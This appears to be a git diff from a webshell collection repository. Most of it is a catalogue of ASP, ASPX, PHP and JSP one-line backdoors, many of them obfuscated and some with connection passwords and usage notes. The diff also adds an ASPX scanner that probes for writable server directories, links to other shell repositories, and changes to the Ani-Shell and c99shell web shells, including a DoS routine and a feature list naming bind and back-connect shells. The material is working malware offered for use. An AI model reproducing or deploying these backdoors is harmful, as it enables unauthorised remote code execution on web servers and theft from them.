+notice like this when it starts in an interactive mode:
+
+    {project}  Copyright (C) {year}  {fullname}
+    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+    This is free software, and you are welcome to redistribute it
+    under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License.  Of course, your program's commands
+might be different; for a GUI interface, you would use an "about box".
+
+  You should also get your employer (if you work as a programmer) or school,
+if any, to sign a "copyright disclaimer" for the program, if necessary.
+For more information on this, and how to apply and follow the GNU GPL, see
+<http://www.gnu.org/licenses/>.
+
+  The GNU General Public License does not permit incorporating your program
+into proprietary programs.  If your program is a subroutine library, you
+may consider it more useful to permit linking proprietary applications with
+the library.  If this is what you want to do, use the GNU Lesser General
+Public License instead of this License.  But first, please read
+<http://www.gnu.org/philosophy/why-not-lgpl.html>.

net-friend/可读写目录探测/啊D小工具 - 目录读写检测 [ASPX版].aspx

@@ -0,0 +1,69 @@
+<%@ Page Language="C#" ValidateRequest="false" %>
+<%@ Import Namespace="System.IO" %>
+<%@ Import Namespace="System.Text" %>
+
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head runat="server">
+    <title>ScanWrtieable</title>
+</head>
+<body>
+
+    <script runat="server">
+    
+        protected void Page_Load(object sender, EventArgs e)
+        {
+        }
+        int cresults;
+        protected void ScanRights(DirectoryInfo cdir)
+        {
+             try
+             {
+                 if (Int32.Parse(TextBox_stopat.Text) > 0)
+                 {
+                     if (cresults > Int32.Parse(TextBox_stopat.Text))
+                         return;
+                 }
+                DirectoryInfo[] subdirs = cdir.GetDirectories();
+                foreach (DirectoryInfo item in subdirs)
+                {
+                    ScanRights(item);
+                }
+
+                File.Create(cdir.FullName + "\\test").Close();
+               
+                    this.Lb_msg.Text += cdir.FullName+"<br/>";
+                    cresults++;
+                    File.Delete(cdir.FullName + "\\test");
+
+             }
+
+             catch { }
+        }
+        System.DateTime start = DateTime.Now;
+        protected void ClearAllThread_Click(object sender, EventArgs e)
+        {
+            this.Lb_msg .Text= "";
+            cresults = 0;
+            ScanRights(new DirectoryInfo(Fport_TextBox.Text));
+            TimeSpan usetime = System.DateTime.Now - start;
+            this.Lb_msg.Text +="usetime: "+ usetime.TotalSeconds.ToString();
+        }
+        
+
+    </script>
+
+    <form id="form1" runat="server">
+   
+    <div>
+         start<asp:TextBox ID="Fport_TextBox" runat="server" Text="c:\" Width="60px"></asp:TextBox>&nbsp;&nbsp; 
+         Stopat <asp:TextBox ID="TextBox_stopat" runat="server" Text="5" Width="60px"></asp:TextBox>files
+        <asp:Button ID="Button" runat="server" OnClick="ClearAllThread_Click" Text="ScanWriterable" /><br />
+        <asp:Label ID="Lb_msg" runat="server" Text=""></asp:Label>
+        <br />
+        &nbsp;</div>
+         <div>Code By <a href ="http://www.hkmjj.com">Www.hkmjj.Com</a></div>
+    </form>
+</body>
+</html>

other shell repository

@@ -1,2 +1,20 @@
 add other webshell collect repository
 url : https://github.com/tdifg/WebShell
+
+add public-shell repository
+url : https://github.com/BDLeet/public-shell
+
+add web-backdoors
+url : https://github.com/all3g/fuzzdb/tree/master/web-backdoors
+
+add web-shell
+url : https://github.com/BlackArch/webshells
+
+add webshellSample
+url : https://github.com/tanjiti/webshellSample
+
+add Ridter'Pentest backdoor tools
+url : https://github.com/Ridter/Pentest/tree/master/backdoor
+
+add xl7dev'WebShell
+https://github.com/xl7dev/WebShell  小乐天 From: Knownsec

other/small_shell.txt

@@ -0,0 +1,244 @@
+======================================================
+||                     ASP一句话                    ||
+======================================================
+----------------------------------------
+<%
+<!-- caidao setting input:<O>sb=eval(request(0))</O>,connecting pass:0 -->
+re= request("sb")
+if re <>"" then
+execute re
+response.end
+end if
+%>
+----------------------------------------
+<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%>
+----------------------------------------
+<%   
+codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"  
+execute (decode (codeds) )   
+Function DeCode (Coded)   
+    On Error Resume Next  
+    For i = 1 To Len (Coded)   
+        Curchar = Mid (Coded, i, 1)   
+        If Asc (Curchar) = 16 then   
+            Curchar = chr (8)   
+Elseif Asc (Curchar) = 24 then   
+            Curchar = chr (12)   
+Elseif Asc (Curchar) = 32 then   
+            Curchar = chr (18)   
+        Else    
+            Curchar = chr (Asc (Curchar) -3)   
+        End if   
+        DeCode = Decode&Curchar   
+    Next  
+End Function  
+'response.write(decode(codeds)) 
+' 菜刀连接 /hkmjj.asp?xx=x ,密码 hkmjj
+%>
+----------------------------------------
+<% 
+dim x1,x2 
+x1 = request("pass") 
+x2 = x1 
+eval x2 
+%>
+----------------------------------------
+<% 
+Function MorfiCoder(Code) 
+  MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf) 
+End Function 
+Execute MorfiCoder(")/*/z/*/(tseuqer lave") 
+%>
+Password: z
+----------------------------------------
+<%a=request("cmd")%><%eval a%>
+----------------------------------------
+<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%>
+----------------------------------------
+<%execute(request("xiaoma"))%>
+----------------------------------------
+1":eval request("a")'
+----------------------------------------
+"%><%eval request("a")%><%'" 
+----------------------------------------
+<%Y=request("x")%> <%execute(Y)%>
+----------------------------------------
+<%eval request("xiaoma")%>
+----------------------------------------
+┼癥污爠煥敵瑳∨≡┩愾  password: a
+----------------------------------------
+======================================================
+||                     ASPX一句话                   ||
+======================================================
+----------------------------------------
+<%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>
+----------------------------------------
+<% @Page Language="Jscript"%><%eval(Request.Item["hucxsz"],"unsafe");%>
+----------------------------------------
+<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"])  ); }%>
+----------------------------------------
+<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
+----------------------------------------
+<script type="text/javascript" language="C#">// <![CDATA[
+ WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10"); // ]]></script>
+Password: webadmin
+----------------------------------------
+<script runat="server" language="JScript"> 
+   function popup(str) { 
+  var q = "u"; 
+  var w = "afe"; 
+  var a = q + "ns" + w; 
+  var b= eval(str,a); 
+  return(b); 
+   } 
+</script>
+----------------------------------------
+<% 
+popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=")))); 
+%>
+Password: z
+----------------------------------------
+<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["xiaoma"],"unsafe"));%>
+----------------------------------------
+<%@ Page Language="C#" ValidateRequest="false" %>
+<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["f4ck"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
+======================================================
+||                     PHP一句话                    ||
+======================================================
+----------------------------------------
+?JFIF 



+<?php @eval($_POST['caidao']);?>
+----------------------------------------
+<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
+----------------------------------------
+<?php @preg_replace("//e",$_POST[x],"e");exit("|LO|"); ?>
+----------------------------------------
+<?php array_map("ass\x65rt",(array)$_REQUEST['test']);?>
+----------------------------------------
+<?php $item['wind'] = 'assert';$array[] = $item;$array[0]['wind']($_POST['whirlwind']);?>
+----------------------------------------
+<?php if(isset($_POST["f4ck"])){$a=strrev("edoced_46esab");eval($a($_POST[z0]));}?>
+----------------------------------------
+<?php if(md5($_GET['pass'])=='21232f297a57a5a743894a0e4a801fc3'){eval($_POST[console]);}else{die('fuck off!');}?>
+----------------------------------------
+<?php
+//Password: $ws->Run
+eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA==')));
+?>
+----------------------------------------
+<?php
+	$fatezero	= "SABERBERSERKER(\$LANCERPCASTEROSTCASTERARCHERCASTER'faCASTERtASSASSINzCASTERASSASSINCASTERro'RIDER)GINTAMA";
+	$fatestaynight	= str_replace("CASTER", "", $fatezero);
+	$fatezero	= str_replace("LANCER", "_", $fatestaynight);
+	$fatestaynight	= str_replace("SABER", "ev", $fatezero);
+	$fatezero	= str_replace("BERSERKER", "al", $fatestaynight);
+	$fatestaynight	= str_replace("RIDER", "]", $fatezero);
+	$fatezero	= str_replace("GINTAMA", ";", $fatestaynight);
+	$fatestaynight	= str_replace("ARCHER", "[", $fatezero);
+	$fatezero	= str_replace("ASSASSIN", "e", $fatestaynight);
+
+	if($fatestaynight !== $fatezero)
+	{
+		eval($fatezero);//fatezero
+	}
+?> 
+----------------------------------------
+<?php
+//http://test.com/get_write.php?a=/shell.php&b=3C3F70687020406576616C28245F504F53545B2763616964616F275D293B3F3E
+//caidao connecting http://test.com/shell.php	pass:caidao
+$p=realpath(dirname(__FILE__)."/").$_GET["a"];
+$t=$_GET["b"];
+$tt="";
+for ($i=0;$i<strlen($t);$i+=2) $tt.=urldecode("%".substr($t,$i,2));
+@fwrite(fopen($p,"w"),$tt);
+echo "success!";
+var_dump($p,$tt);
+?>
+----------------------------------------
+<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['k8']);?>
+----------------------------------------
+<?php $mujj = $_POST['z'];if ($mujj!=""){$xsser=base64_decode($_POST['z0']);@eval("\$safedg = $xsser;");}?>
+----------------------------------------
+<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>
+----------------------------------------
+<?php preg_replace("/^/e",base64_decode($_REQUEST[g]),0);?>
+----------------------------------------
+<?php fputs(fopen("./shell.php","w"),"<?eval(\$_POST[a]);?>")?>
+----------------------------------------
+<?php if($_POST[admin]){assert($_POST[admin]);}else{phpinfo();}?>
+----------------------------------------
+<?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)','add');?>
+----------------------------------------
+<?php ($_=@$_GET[2]).@$_($_POST[1])?>
+caidao: http://site/1.php?2=assert Password: 1
+----------------------------------------
+<?php
+$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
+$hh("/[discuz]/e",$_POST['h'],"Access");
+?>
+----------------------------------------
+<?php
+$user="63a9f0ea7bb98050796b649e85481845"; #root
+$pass="7b24afc8bc80e548d66c4e7ff72171c5"; #toor
+
+if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
+{eval($_GET['idc']);}
+?>
+---------------------------------------
+<?php
+    $func = new ReflectionFunction($_GET[m]);
+    echo $func->invokeArgs(array($_GET[c],$_GET[id]));
+?>
+shell.php?m=file_put_contents&c=test.php&id=<?@eval($_POST[c]);?> //写入一句话马 for linux
+shell.php?m=file_put_contents&c=test.php&id=<?php eval($_POST[c]);?> //写入一句话马 for windows
+shell.php?m=system&c=echo ^<?php eval^($_POST[c]^);?^> >test.php //在当前目录下面生成一句话马 for windows
+shell.php?m=system&c=wget http://xxx.xxx/igenus/images/suffix/test.php //当前目录下载一句话马 for linux
+----------------------------------------
+<?php assert($_POST[sb]);?>
+----------------------------------------
+<script language="php">@eval($_POST[sb])</script>
+caidao: <O>h=@eval($_POST1);</O>  Password: sb
+----------------------------------------
+<?php eval($_POST[xiaoma]);?>
+----------------------------------------
+<?php $_GET['ts7']($_POST['cmd']);?>
+//caidao: http://www.target.com/shell.php?ts7=assert
+----------------------------------------
+<?php
+@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
+@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
+@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
+[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]); // Password: -7
+?>
+----------------------------------------
+<?fputs(fopen("test.php","w"),'<?php eval($_POST["cmd"]);?>');?>
+----------------------------------------
+<?php
+error_reporting(0);
+set_time_limit(0);
+function decrypt($ciphertext_hex,$key){
+$key=md5($key);
+$iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC);
+$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);
+$ciphertext_dec = pack("H*",$ciphertext_hex);
+$iv_dec = substr($ciphertext_dec, 0, $iv_size);
+$ciphertext_dec = substr($ciphertext_dec, $iv_size);
+$plaintext_dec = mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key,$ciphertext_dec, MCRYPT_MODE_CBC, $iv_dec);
+return trim($plaintext_dec);
+}
+if(@$_REQUEST['key']){
+$key=$_REQUEST['key'];
+$hash='bd40dd58f44adc5c334e53418ea1bcd591521d60662c6753b89dc46bb02b1ecb02bf857eaa0ea5d5a36ecf638d65c55eb9a8f2b17ceb2d740e3eba7792d3995b7d4fdbdf9f5f90b219cf955539b169a40109ff496262cbc21050e6993d1f9a6a678990e0b01a03617dd4b38358d78e9a67eabe8b288487a96ca55a94e8d6614a';
+$shellcode='12ec445a8c4be78007d08367455c60d571c3509ba62d1f2b321fa824667345ff3131b02b81c8ad646ffc3360e60d19d3f7f43b7b21f5bca05d6e7abfc2461b5d72fffb22659aa08655cdd8734baa0fd47b93a5659348954f853d3a68022fb3422a3832efa04792c1a81680e5aa8081716f169e05afb332a26fbd0f76ae8905b9a068ddb54f3ae107ba673362835951f4953db1079b6a3c0b4eb20ca96a241936244947ee67e0d563d8b2eee439cc5ba21151ae520eec0a663f092f9845918c7d6630764dad77808e376e099008403b01c491399da5cb3c8926c29b1bf89e8c751fb33a850c608b20e4c41cf28ec8b8060a30a827b43cd301d9c587863ce39f2326345a0217110fc898acb6c3343f3ce8';
+eval(decrypt($hash,$key));
+}else{
+echo 'ERROR!';
+}
+//caidao:  <0>key=90sec</0>  or  Url: http://www.target.com/90sec.php?key=90sec   Password: shell
+----------------------------------------
+======================================================
+||                     JSP一句话                    ||
+======================================================
+----------------------------------------
+<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
+----------------------------------------

php/Ani-Shell/Ani-Shell.php

@@ -1939,12 +1939,10 @@ else if(isset($_GET['dos']))
     isset($_GET['exTime']) &&
     isset($_GET['port']) &&
     isset($_GET['timeout']) &&
-    isset($_GET['exTime']) &&
     $_GET['exTime'] != "" &&
     $_GET['port'] != "" &&
     $_GET['ip'] != "" &&
-    $_GET['timeout'] != "" &&
-    $_GET['exTime'] != ""
+    $_GET['timeout'] != ""
     )
     {
        $IP=$_GET['ip'];

php/DAws.md

@@ -0,0 +1,10 @@
+DAws  a php webshell
+
+Author:[dotcppfile](https://github.com/dotcppfile/)
+
+url:https://github.com/dotcppfile/DAws
+
+There's multiple things that makes DAws better than every Web Shell out there:
+
+![alt tag](http://i.imgur.com/nUmccKQ.png)
+

php/PHPshell/c99shell/c99shell.php

@@ -2,35 +2,35 @@
 /*
 ******************************************************************************************************
 *
-*                    c99shell.php v.1.0 (<EFBFBD><EFBFBD> 5.02.2005)
+*                    c99shell.php v.1.0 (îò 5.02.2005)
 *		   Freeware WEB-Shell.
-*		      <EFBFBD> CCTeaM.
-*  c99shell.php - <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> www-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
-*  <EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: http://ccteam.ru/releases/c99shell
+*		      © CCTeaM.
+*  c99shell.php - øåëë ÷åðåç www-áðîóçåð.
+*  Âû ìîæåòå ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà: http://ccteam.ru/releases/c99shell
 *
 *  WEB: http://ccteam.ru
 *  UIN: 656555
 * 
-*  <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
-*  ~ <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> tar)
-*    modify-time <EFBFBD> access-time <EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>
-     <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD>./<2F><><EFBFBD>. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> $filestealth)
-*  ~ <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
-*  ~ <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> unix-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,
-     <EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
-*  ~ <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>)
-*  ~ <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PHP-<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-*  ~ <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-*  ~ <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ftp-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> login;login <EFBFBD><EFBFBD>
-     /etc/passwd (<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> 1/100 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
-*  ~ <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> SQL
-*  ~ <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> "<22><><EFBFBD><EFBFBD><EFBFBD>" include, <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> $surl.
-*  ~ <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> /bin/bash <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,
-     <EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> back connect (<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,
-    <EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> NetCat).
+*  Âîçìîæíîñòè:
+*  ~ óïðàâëåíèå ôàéëàìè/ïàïêàìè, çàêà÷èâàíèå è ñêà÷èâàíèå ôàéëîâ è ïàïêîê (ïðåäâîðèòåëüíî ñæèìàåòñÿ â tar)
+*    modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè
+     ðåäàêòèðîâàíèè ôàéëîâ (âûêë./âêë. ïàðàìåòðîì $filestealth)
+*  ~ ïðîäâèíóòûé ïîèñê ïî ôàéëàì/ïàïêàì (èùåò òàêæå âíóòðè ôàéëîâ)
+*  ~ óïðàâëåíèå ïðîöåññàìè unix-ìàøèíû, âîçìîæíîñòü îòïðàâêè ñèãíàëà çàâåðøåíèÿ,
+     à òàêæå áàíàëüíîå "ïðèáèâàíèå" ïðîöåññà.
+*  ~ óäîáíîå (èíîãäà ãðàôè÷åñêîå) âûïîëíåíèå øåëë-êîìàíä (ìíîãî àëèàñîâ, ìîæíî ëåãêî äîáàâëÿòü/óäàëÿòü èõ)
+*  ~ âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà
+*  ~ âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà
+*  ~ áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç
+     /etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)
+*  ~ ïðîäâèíóòûé ìåíåäæåð SQL
+*  ~ ñêðèïò "ëþáèò" include, äëÿ íîðìàëüíîé ðàáîòû, Âàì íóæíî ñìåíèòü $surl.
+*  ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì,
+     èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ,
+    è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat).
 *
 *
-*  5.02.2005 <EFBFBD> Captain Crunch Security TeaM
+*  5.02.2005 © Captain Crunch Security TeaM
 *
 *  Coded by tristram
 ******************************************************************************************************
@@ -99,25 +99,25 @@ $bindport_port = "11457";	// default port for binding
 /* Command-aliases system */
 $aliases = array();
 $aliases[] = array("-----------------------------------------------------------", "ls -la");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> suid <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> suid <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> sgid <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
